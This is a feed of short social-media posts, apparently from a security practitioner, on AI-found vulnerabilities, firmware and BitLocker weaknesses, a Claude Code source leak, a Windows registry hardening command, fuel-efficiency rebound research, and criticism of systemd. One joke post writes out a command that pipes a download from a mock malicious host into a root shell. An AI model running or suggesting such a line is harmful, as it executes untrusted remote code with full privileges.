Why do you have such enmity against microphone wind shields?
Posts by dragosr
LLM-found vulnerabilities don't need panic, they need faster patching. Equip your developers with AI tools for code comprehension, triage, and testing. Defenders have full source access — LLMs amplify that advantage. The bottleneck isn't technology, it's adoption.
secwest.net/ai-triage
Rust is the one true way to write performant, safe code - unlike those archaic, dangerous, and inefficient primitive languages. Your heresy is noted.
I watched LLMs write full exploit chains years ago. The amazement fades once you hit context limits and have to steer the model through every hard corner. The industry is full of people who just got here and are still in the amazement phase. That's the gap worth watching.
Anthropic accidentally leaked Claude Code's source code. Researcher Chaofan Shou found a .map file in the npm package linking to the full, unobfuscated TypeScript files in an R2 bucket. The internet is now rapidly downloading and analyzing the logic behind the CLI tool.
github.com/nirholas/cla...
MDSec shows how to patch Dell UEFI firmware offline to disable pre-boot DMA protection while the BIOS UI still shows it enabled. TPM PCRs don't catch the NVRAM change, so BitLocker boots fine. Patch survives official BIOS updates. Then PCILeech gets you SYSTEM. Measured boot gap worth studying.
This could open up a lot longer contexts on phones and local GPU LLMs. One early implementation experiment on a 16g 5060Ti increased context from 8k to 40k
github.com/tonbistudio/...
Google's TurboQuant compresses KV cache to 3 bits with no accuracy loss — 6x memory reduction, 8x attention speedup on H100. No official code yet but llama.cpp and MLX integration is underway. Good technical breakdown with pseudocode here: turboquant.net
Azure: default outbound access going away for subnets April 1st. New subnets private by default. Old outbound behaviour still available by explicit config, or deploy a NAT Gateway (~$36/mo) for better architecture. Pre-April subnets grandfathered. Check your deploy scripts before they break.
Your UEFI firmware can drop a binary into Windows on every boot via Windows Platform Binary Table. OEMs use it for bloatware persistence. Attackers use it the same way. One reg key kills it:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v DisableWpbtExecution /d 1 /t REG_DWORD /f
i loved tribes.... good times.
Meta spent seven years telling us they were working on true end-to-end encryption across all their various messaging apps... and finally rolled it out in 2024. And then less than three years later, they're shutting it off for Instagram? What?
www.androidpolice.com/instagram-is...
Nasty cross tenant bugs.
The character at a time blind data exfiltration is particularly clever here.
www.tenable.com/blog/leakylo...
Induced demand from highway expansion may matter as much as fuel cost rebound for VMT growth. Fuel efficiency improvements do save fuel — roughly 75-90% of the expected savings stick. A catchy name shouldn’t override the weight of evidence. 5/5
Small & Van Dender’s simultaneous-equations model found a long-run rebound of ~22%, shrinking to ~11% in recent data. As incomes rise, fuel cost becomes a trivial share of driving decisions. The effect is getting smaller over time, not larger. 4/5
The study uses 2009 survey data — one snapshot during a recession with volatile gas prices. People who expect to drive a lot buy efficient cars, reversing the causal arrow. OLS regression misses this endogeneity and inflates the rebound estimate. 3/5
Income, urban sprawl, road infrastructure, and total ownership cost drive VMT far more than fuel price. Fuel is ~15-25% of car costs. Depreciation, insurance, and financing dominate. VMT tracks income growth and suburban expansion more closely than efficiency gains. 2/5
The broader literature disagrees with this. The rebound effect is real but most rigorous estimates land at 10-25% — well short of the >100% threshold needed for actual Jevons’ paradox. A few reasons this study overshoots. 🧵1/5
Peer-reviewed study (n=12,000) finds that those who have been far as decided to use even go want to do look more like report a 23% increase in something, probably.
Friends don't let friends OpenClaw. You might as well just "sudo ( curl malware.ru | bash )" and save some time.
Seems more tragic than funny to me but we all have different ways of reacting to sad situations.
Our real only hope is AI. A few very experienced developers supercharged with modern LLM tools could be productive enough to broach that enormous gulf with intense effort if the motivation somehow struck them. But until / if that happens we are stuck with the ShitBorg.
GNOME has adamantly refused a modular back end. KDE has been a little more flexible... but the cost of building an alternative exceeds the benefit for any single actor. And elogind exists as a pressure release valve that keeps the situation tolerable enough that nobody is forced to solve it properly
It's a chicken and egg problem too. Unless one of the major distros defects from the systemd camp there isn't enough adoption to replace logind. Desktop Linux market share is so small that non-systemd users are a rounding error. The people who could build an alternative are maintaining elogind/seatd..
There is no real specification for what a session manager should expose. Architectural coupling with logind and Gnome/KDE are probably the biggest hurdles.
Poettering and the other devs have been adamantly refusing to decouple logind and dbus from systemd PID1. They abandoned ConsoleKit.
Systemd is a giant blob of shit, slowly (and not so slowly) growing and engulfing all the functionality in the operating system in a huge monolithic turd.
It is the exact opposite of modular and creates this inescapable mother of all single points of failure and complexity.
Nearly all upstream projects ship with systemd unit files, if you use an alternative you have to spend a lot of time writing and maintaining init scripts. The old init file ecosystem has atrophied.
Dependency sprawl basically.
Then there is the networking stack. And timer units instead of crontabs.
Void, Artix, Gentoo, Alpine, Chimera... and others maintain independence but have to go through serious pain and non-trivial development to keep from being assimilated by systemd Borg...
Systemd has been one giant mis-step and the further we go down that path the more difficult it gets to unfuck...
The problem is the lock-in - desktop environments Gnome, KDE heavily depend on the logind D-bus API - elogind exists but it lags and needs patching.
systemd owns cgroup, and docker, podman et al wired in to systemd managing cgroup.
So many things coupled to libsystemd and udev. The systemd Borg...